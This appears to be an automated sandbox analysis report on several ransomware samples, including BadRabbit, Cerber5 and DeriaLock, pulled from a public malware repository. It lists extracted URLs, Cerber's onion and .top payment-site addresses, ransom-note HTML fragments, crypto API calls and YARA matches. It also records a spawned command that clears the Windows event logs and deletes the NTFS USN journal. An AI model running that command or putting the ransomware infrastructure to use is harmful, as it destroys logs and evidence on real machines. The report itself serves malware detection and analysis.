      Source: rundll32.exe, 00000003.00000003.307613012.0000000000505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/c
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.blo
      Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.drString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/
      Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.drString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/LOGON.exe
      Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.drString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txt
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://btc.blo
      Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
      Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
      Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: rundll32.exe, 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, dispci.exe.3.dr, cscc.dat.3.drString found in binary or memory: http://diskcryptor.net/
      Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
      Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.drString found in binary or memory: http://ocsp.thawte.com0
      Source: Endermanch@Krotten.exe.0.drString found in binary or memory: http://poetry.rotten.com/lightning/
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://rb.symcb.com/rb.crl0W
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://rb.symcb.com/rb.crt0
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://rb.symcd.com0&
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://s.symcd.com0
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://s.symcd.com06
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://sf.symcb.com/sf.crl0W
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://sf.symcb.com/sf.crt0
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://sf.symcd.com0&
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315117321.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.drString found in binary or memory: http://wallup.net
      Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315117321.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.drString found in binary or memory: http://wallup.nethttp://wallup.nethttp://wallup.net
      Source: svchost.exe, 00000036.00000002.404447518.0000028260013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.17gcun.top/12F2-EF4B-B826-0098-BE1F
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.18ey8e.top/12F2-EF4B-B826-0098-BE1F
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.19kdeh.top/12F2-EF4B-B826-0098-BE1F
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1mpsnr.top/12F2-EF4B-B826-0098-BE1F
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1n5mod.top/12F2-EF4B-B826-0098-BE1F
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: Endermanch@BadRabbit.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
      Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.drString found in binary or memory: https://d.symcb.com/rpa06
      Source: svchost.exe, 00000036.00000003.389098362.000002826005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
      Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
      Source: svchost.exe, 00000036.00000003.390242808.0000028260047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
      Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
      Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
      Source: svchost.exe, 00000036.00000002.409546838.0000028260042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.391639862.0000028260041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
      Source: svchost.exe, 00000036.00000002.409546838.0000028260042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.391639862.0000028260041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
      Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000036.00000003.389098362.000002826005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
      Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.404447518.0000028260013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000036.00000003.391384207.0000028260045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000036.00000003.391384207.0000028260045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409502792.000002826003A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
      Source: svchost.exe, 00000036.00000003.390242808.0000028260047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8
      Source: Endermanch@Cerber5.exe, 00000013.00000003.353550421.00000000063DA000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.472553764.00000000063C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/downlo&#097;d/download-easy.html.en
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html.en
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/results?search_query=Install
      Source: unknown DNS traffic detected: queries for: github.com
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_007B2054 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_007B2054
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1 Host: github.com Connection: Keep-Alive
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1 Host: github.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1 Host: raw.githubusercontent.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1 Host: github.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1 Host: raw.githubusercontent.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1 Host: github.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1 Host: raw.githubusercontent.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1 Host: github.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1 Host: raw.githubusercontent.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1 Host: github.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1 Host: raw.githubusercontent.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1 Host: github.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1 Host: raw.githubusercontent.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1 Host: github.com
      Source: global traffic HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1 Host: raw.githubusercontent.com
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">0t</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">x8aFJo5</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">{RAND}</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">{RAND}</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Indien uw problemen heeft tijdens de installatie of het gebruik van Tor&nbsp;Browser, ga dan naar <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> en typ in de zoekbalk equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Se si riscontrano problemi durante l'installazione o l'utilizzo di Tor&nbsp;Browser, visitare <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e immettere "install tor browser windows" nella barra di ricerca per trovare numerosi video esplicativi sull'installazione e utilizzo di Tor&nbsp;Browser.</p> equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: do portalu <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> i wpisz w wyszukiwarce equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hrend der Installation von Tor&nbsp;Browser Probleme haben, besuchen Sie bitte <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> und geben als Suchanforderung "tor browser Windows installieren" ein und Sie erhalten in den Suchergebnossen viele Anleitungsvideos equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n, o durante el uso del Navegador Tor, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> y escriba la solicitud en la barra de b equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o do Tor&nbsp;Browser, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e insira o pedido na barra de pesquisa equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rken herhangi bir sorununuz olursa <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> adresine gidin ve arama equals www.youtube.com (Youtube)
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: utilisation de Tor&nbsp;Browser, veuillez visiter <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> et saisir la demande dans la barre de recherche equals www.youtube.com (Youtube)
      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49719 version: TLS 1.2
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_004089AC GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkColor,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextA,DrawTextA,GetObjectW,GetDIBits,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,SystemParametersInfoW,SelectObject,DeleteObject,SelectObject,DeleteObject,DeleteDC,ReleaseDC,19_2_004089AC
      Source: Endermanch@Cerber5.exe, 00000013.00000002.416614254.000000000176A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      Spam, unwanted Advertisements and Ransom Demands

      Source: Yara matchFile source: 44.0.Endermanch@DeriaLock.exe.d80000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Endermanch@DeriaLock.exe PID: 3576, type: MEMORYSTR
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe, type: DROPPED
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5364, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2212, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2852, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: Endermanch@Cerber5.exe PID: 5148, type: MEMORYSTR
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, type: DROPPED
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_004089AC GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkColor,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextA,DrawTextA,GetObjectW,GetDIBits,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,SystemParametersInfoW,SelectObject,DeleteObject,SelectObject,DeleteObject,DeleteDC,ReleaseDC,19_2_004089AC
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_004089AC GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkColor,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextA,DrawTextA,GetObjectW,GetDIBits,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,SystemParametersInfoW,SelectObject,DeleteObject,SelectObject,DeleteObject,DeleteDC,ReleaseDC,40_2_004089AC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B15A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_007B15A7
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040AF8D memcpy,CryptImportKey,19_2_0040AF8D
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B253 CryptImportKey,19_2_0040B253
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B253 CryptImportKey,40_2_0040B253
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040AF8D memcpy,CryptImportKey,40_2_0040AF8D

      System Summary

      Source: 32.2.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 49.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
      Source: 40.2.Endermanch@Cerber5.exe.4df0000.2.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
